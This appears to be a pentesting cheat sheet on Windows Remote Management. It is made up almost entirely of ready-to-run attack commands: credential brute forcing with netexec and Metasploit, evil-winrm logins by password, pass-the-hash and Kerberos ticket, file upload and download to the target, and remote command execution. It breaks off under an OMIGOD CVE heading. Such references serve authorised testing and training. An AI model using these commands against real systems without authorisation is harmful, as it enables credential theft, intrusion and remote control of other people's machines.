WinRM (Windows Remote Management) Pentesting
Last modified: 2025-03-19
The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.
Enumeration
Brute Force Credentials
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
Connect
Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.
Using Username/Password
evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
If you have private key and public key, you can use them for authentication.
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
Using Kerberos Authentication
If we have a Kerberos ticket of a user, we can login with its ticket, but some settings are required.
At first, we need to modify the nameserver
value in the /etc/resolv.conf
in our attack machine.
nameserver <target-ip>
and modify /etc/krb5.conf
(or create a new one if it does not exist) in our attack machine as below:
[libdefaults]
default_realm = EXAMPLE.LOCAL
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
EXAMPLE.LOCAL = {
kdc = dc.example.local
admin_server = dc.example.local
default_domain = example.local
}
[domain_realm]
example.local = EXAMPLE.LOCAL
.example.local = EXAMPLE.LOCAL
Note that example.local
and dc.example.local
must be added to /etc/hosts
.
Now set the environment variable and login with evil-winrm
:
export KRB5CCNAME=<username>.ccache
evil-winrm -i dc.example.local -r example.local
Commands
After connecting with evil-winrm
, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
# List all services
PS> services
Command Execution with NetExec
# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'
# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
OMIGOD (CVE-2021-38647)
Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).
There are many PoC available, for instance: